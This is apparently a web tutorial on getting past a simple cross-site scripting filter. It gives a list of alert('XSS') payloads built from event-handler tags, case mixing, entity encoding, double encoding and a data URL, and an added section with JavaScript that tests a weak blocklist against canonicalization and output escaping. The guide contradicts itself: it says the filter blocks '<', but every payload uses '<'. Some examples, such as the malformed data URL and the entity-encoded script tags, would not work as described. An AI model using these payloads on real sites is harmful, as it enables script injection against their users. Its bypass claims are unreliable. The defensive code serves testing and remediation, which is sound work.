Bypass Simple XSS Filter (<)

TL;DR

This guide shows how to bypass a basic XSS filter that only blocks the less-than symbol (<). We’ll use alternative HTML tags, encoding tricks, and case mixing to get JavaScript code executed.

Bypassing the Filter

  1. Understanding the Problem: The filter is likely looking for <script>, <img src="…"> etc. It’s a very basic defence and easily bypassed.
  2. Alternative Tags: Try using other HTML tags that can execute JavaScript. Some examples include:
    • <body onload=alert('XSS')> – Executes when the page loads.
    • <svg onload=alert('XSS')> – Similar to body, but using an SVG element.
    • <input type="image" src="x" onerror=alert('XSS')> – Executes when the image fails to load.
  3. Case Mixing: Filters often don’t account for letter case, while HTML tag names are case-insensitive. Try mixing upper and lower case letters:
    • <ScRiPt>alert('XSS')</sCrIpT>
  4. Encoding: HTML encoding can sometimes bypass filters. Try using character entities.
    • Decimal Encoding: &#60;script&#62;alert('XSS')&#60;/script&#62;
    • Hexadecimal Encoding: &#x3C;script&#x3E;alert('XSS')&#x3C;/script&#x3E;
  5. Attribute-Based XSS: If the filter allows attributes, you can inject JavaScript into event handlers.
    • <img src="x" onerror=alert('XSS')> – The onerror attribute executes when the image fails to load.
    • <body onmouseover=alert('XSS')> – Executes when the mouse hovers over the body element.
  6. Using Data URLs: Sometimes, data URLs can help bypass filters.
    • <img src="data:image/svg+xml;<svg onload=alert('XSS')>">
  7. Double Encoding (Less Common): In some cases, double encoding might work if the application decodes the input multiple times.
    • Encode < to &#60;, then encode that again to &amp;#60;. This is less likely to succeed but worth a try.
  8. Testing: After each attempt, check if the JavaScript code executes in your browser.
    • Use your browser’s developer tools (usually F12) to inspect the HTML source and see if the injected code is present.
    • Look for JavaScript errors in the console that might indicate successful execution.
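
The same weakness from the defending side, as an added example that is not part of the original post: a case-sensitive blocklist passes most of the sample strings, while canonicalizing before validation and HTML-encoding at output neutralizes all of them. All function names are hypothetical, and samples 4 and 5 are constructed entity-encoded forms of sample 1.

```javascript
// Added example, not from the original post. All function names are hypothetical.
// Samples 1-3 are strings from the list above; 4-5 are constructed entity-encoded forms.
const SAMPLES = [
  "<script>alert('XSS')</script>",
  "<svg onload=alert('XSS')>",
  "<ScRiPt>alert('XSS')</sCrIpT>",
  "&#60;script&#62;alert('XSS')&#60;/script&#62;",
  "&amp;#60;script&amp;#62;alert('XSS')&amp;#60;/script&amp;#62;",
];

// Weak control: case-sensitive blocklist for one tag, applied to the raw input.
const blocklistAllows = (input) => !input.includes("<script");

// One round of entity decoding, as a later processing step might apply.
const NAMED = { amp: "&", lt: "<", gt: ">", quot: '"' };
function decodeEntities(s) {
  return s.replace(/&(#x[0-9a-f]+|#\d+|amp|lt|gt|quot);/gi, (_, e) => {
    e = e.toLowerCase();
    if (e[0] !== "#") return NAMED[e];
    const cp = e[1] === "x" ? parseInt(e.slice(2), 16) : parseInt(e.slice(1), 10);
    return cp <= 0x10ffff ? String.fromCodePoint(cp) : "\ufffd";
  });
}

// Canonicalize before validating: decode until stable, reject if it never settles.
function canonicalize(s, maxRounds = 5) {
  for (let i = 0; i < maxRounds; i++) {
    const next = decodeEntities(s);
    if (next === s) return s;
    s = next;
  }
  throw new Error("input did not stabilize; reject it");
}

// Fix: encode at output time for HTML text and quoted-attribute contexts.
const ESC = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
const escapeHtml = (s) => String(s).replace(/[&<>"']/g, (c) => ESC[c]);

function report() {
  return SAMPLES.map((p) => ({
    input: p,
    passesBlocklist: blocklistAllows(p),
    markupAfterDecode: /<[a-z]/i.test(canonicalize(p)),
    escaped: escapeHtml(p),
  }));
}

console.table(report(), ["input", "passesBlocklist", "markupAfterDecode"]);
```

escapeHtml covers HTML text and quoted attribute values only; values placed in unquoted attributes, URLs or script blocks need the encoder for that context.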

Important Note: This information is provided for educational purposes only. Do not use these techniques to attack websites without permission. XSS attacks are illegal and harmful.
